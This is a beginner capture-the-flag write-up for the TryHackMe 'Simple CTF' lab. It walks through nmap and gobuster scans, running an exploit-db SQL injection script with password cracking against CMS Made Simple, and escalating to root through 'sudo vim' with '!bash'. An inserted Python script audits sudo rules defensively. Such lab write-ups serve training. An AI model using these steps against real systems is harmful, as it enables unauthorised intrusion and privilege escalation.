Simple CTF writeup

venom sec
Jun 18, 2021

This is a beginner's CTF available on TryHackMe, so I thought it would be a good start for people who are interested in hacking.

Whenever we get an IP address, we run an nmap scan to see which ports are open and can be accessed. Replace the IP address below with the IP of the machine that THM provides you.

@kali:~$ nmap 10.10.98.233
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-16 07:25 EDT
Nmap scan report for 10.10.98.233
Host is up (0.23s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
2222/tcp open EtherNetIP-1

Nmap done: 1 IP address (1 host up) scanned in 16.68 seconds

From this we know that there are 3 open ports. Two of them are the most common ones, 80 and 21: port 80 means there is a web view, and port 21 is FTP, as the scan shows.

Since there is a web view, this is what we see: an Apache2 page. So let's see which other pages or folders are present.

[Image: the machine's web view, an Apache2 page]

Now we can use any tool to find the directories. I will be using gobuster. You will find 301, 403 and 200 status codes; focus on 200.

@kali:~$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.98.233/
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.98.233/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/06/16 07:31:41 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 291]
/.htpasswd (Status: 403) [Size: 296]
/.htaccess (Status: 403) [Size: 296]
/index.html (Status: 200) [Size: 11321]
/robots.txt (Status: 200) [Size: 929]
/server-status (Status: 403) [Size: 300]
/simple (Status: 301) [Size: 313] [--> http://10.10.98.233/simple/]

===============================================================
2021/06/16 07:33:11 Finished
===============================================================

So here we have robots.txt. Here the file doesn't contain anything juicy, but in many situations such files may contain some folder info. Then my focus went to /simple: it has a 301, which means it redirects somewhere, so let's see.

[Image: CMS Made Simple web page]

This redirects to a page that says CMS Made Simple. You may feel it doesn't have anything that could be used, but when you scroll down you will find its version, so you can use searchsploit on cmsmadesimple with the version, or search on Google and go to exploit-db, where the payload is; just download it.

The file is written in Python 2, and newer versions of Kali have dropped Python 2 in the latest upgrades, so search for a Python 2 to Python 3 converter, or do the conversion manually.

It takes time to find the salt, username and password, so you need to wait; if your system is high-end, it may take less time to process.

@kali:~$ python3 cmsmssqli.py -u http://10.10.98.223/simple/ --crack -w list.txt

[Image: SSH terminal access]

Just check what it contains with ls; you need to cat the users.txt, where you will find
G00d j0b, keep up!

Then we need to find the Linux version and the different users that are present. Using cat /etc/*-release we can see that it's an Ubuntu 16.04 system. So let's do privilege escalation to get admin access: we can do that using sudo vim and typing !bash, which gives us a bash terminal without a password.

[Image: VIM]
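
From the defender's side, the sudo vim step works because a sudoers rule lets the user run an editor as root. The following is an added example, not part of the original write-up: it audits `sudo -l` output for rules of that kind. The sample listing, the host name `Machine` and the short list of binaries are assumptions constructed for illustration.

```python
import re

# Illustrative, not exhaustive: programs that can start a shell or run commands.
SHELL_ESCAPE_BINARIES = {"vim", "vi", "nano", "less", "more", "man", "find", "awk"}
OPPOSITE = {"PASSWD": "NOPASSWD", "NOPASSWD": "PASSWD",
            "EXEC": "NOEXEC", "NOEXEC": "EXEC"}
RULE = re.compile(r"^\s*\(([^)]*)\)\s*(.+)$")   # "(runas) [TAG:] cmd, cmd"
TAG = re.compile(r"^([A-Z_]+):\s*")

# Constructed sample of `sudo -l` output; the rule set is an assumption.
SAMPLE = """\
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
    (root) NOEXEC: /usr/bin/less /var/log/syslog
    (root) /usr/sbin/service apache2 restart
"""

def audit_sudo_listing(listing):
    """Return rules in `sudo -l` output that hand out a shell as the run-as user."""
    findings = []
    for line in listing.splitlines():
        m = RULE.match(line)
        if not m:
            continue                      # header or Defaults line
        runas, tags = m.group(1).strip(), set()
        # Simplification: commas escaped inside arguments are not handled.
        for cmd in m.group(2).split(","):
            cmd = cmd.strip()
            while (t := TAG.match(cmd)):  # tags apply to later commands too
                tags.discard(OPPOSITE.get(t.group(1)))
                tags.add(t.group(1))
                cmd = cmd[t.end():]
            if not cmd or "NOEXEC" in tags:
                continue                  # NOEXEC: sudo blocks further exec()
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL" or binary in SHELL_ESCAPE_BINARIES:
                findings.append({"runas": runas, "command": cmd,
                                 "nopasswd": "NOPASSWD" in tags})
    return findings

if __name__ == "__main__":
    for f in audit_sudo_listing(SAMPLE):
        print(f"REVIEW: {f['command']} as {f['runas']}, "
              f"nopasswd={f['nopasswd']}; prefer sudoedit or NOEXEC")
```

For file editing as root, a sudoedit rule lets the user edit the file without running the editor itself as root.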

Now we need to check which users are present; we can check them in the /home directory. We get 2 users: one is mitch, as we know, and the other is sunbath.

Now let's check the root directory to see if there is something there. As suspected, it contains a root directory, and in that directory there is a root.txt file, so let's cat it; that gives us the final thing we need.

[Image: root.txt in the root directory]

So, I hope this write-up was helpful. Thank you for reading.
